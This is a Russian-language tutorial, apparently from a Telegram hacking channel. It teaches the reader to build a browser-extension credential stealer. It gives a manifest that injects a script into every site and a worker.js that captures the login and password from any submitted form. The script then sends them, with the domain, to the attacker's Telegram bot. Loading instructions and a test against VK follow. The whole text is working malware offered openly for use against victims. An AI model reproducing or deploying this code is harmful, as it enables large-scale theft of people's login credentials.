Стиллер в расширении. Web Inject + Telegram API. {BlackCoding}
https://teleg.one/darkside_team
Привет, хацкер, сегодня мы напишем стиллер/логгер на JavaSript с отправкой логов в телегу.
Итак, стиллер работает таким образом:
- Жертва устанавливает расширение в браузер, затем при попытке входа на сайт (данный стиллер поддерживает большинство сайтов) к злоумышленнику (нам) отправляются данные из поля для ввода. Всё просто.
Coding Time!
Создадим manifest.json в котором будет содержаться имя, описание, версия скрипта:
{
"manifest_version": 2,
"name": "IceRed Dquot;, // Имя скрипта
"version": "0.1", // Версия
"description": "Example ChromeExtension", // Описание
"content_scripts": [
{
"matches": [ "<all_urls>" ], // Указываем, что расширение должно работать со всеми url
"js": [ "jquery.js" , "worker.js" ], // Добавляем источники кода
"run_at": "document_end"
}
]
}
P.S Если вы хотите установить фильтр для конкретных сайтов, то вместо <all_urls> вписываете домен сайта(ов)
Следующим шагом нам нужно скачать jquery.js и добавить в папку с нашим расширением.
Теперь нам нужно создать worker.js в котором у нас происходит получение значений из полей для ввода, а после отправка лога в телеграм бот.
var token = 'XXX'; // ВАШ токен тут (замени XXX)
var api = 'https://api.telegram.org/bot' + token; // Переменная для запроса к API с токеном бота
var UID = 'XXX'; // Ваш ID тут (замени XXX)
$("form").submit(function() {
var login = $(this).parent().find('input[type=text]').val(); // Получаем логин, из поля с типом text
var pass = $(this).parent().find('input[type=password]').val(); // Получаем пароль, из поля с типом password
var currentSite = document.domain; // Получаем домен сайта
var message = "<b>NEW LOG 👇</b> \n SITE | LOGIN | PASSWORD " + "\n\n" + currentSite + " | " + login + " | " + pass + '\n Coded by IceRed2K' + '\n\n Special For @darkside_team'; // Создаём переменную, в которой идёт текст сообщения.
$.get(api + '/sendMessage?chat_id=' + UID + '&text=' + encodeURIComponent(message) + '&parse_mode=html'); // Делаем GET запрос, отправляем сообщение
});
Также можно добавить иконку в формате .ico рядом с нашими файлами.
Итоговый скрипт выглядит таким образом:
Готово!
Теперь нужно открыть хром и добавить расширение. Предварительно включи режим разработчика.
Переходим по пути: chrome://extensions/
Нажимаем добавить распакованное расширение, далее указываем папку с нашими файлами:
И у нас появляется расширение:
Теперь всё готово! Проверяем.
Переходим, к примеру на сайт VK, и вводим данные
Нажимаем Войти, и тут к нам приходит сообщение:
Это работает не только с ВК, но и с другими сайтами, форумами.
На этом всё. Удачи тебе, хацкер.
<===================================>
| Скачать исходники: LINK |
| Ориг. репозиторий на GitHub'e: LINK |
<===================================>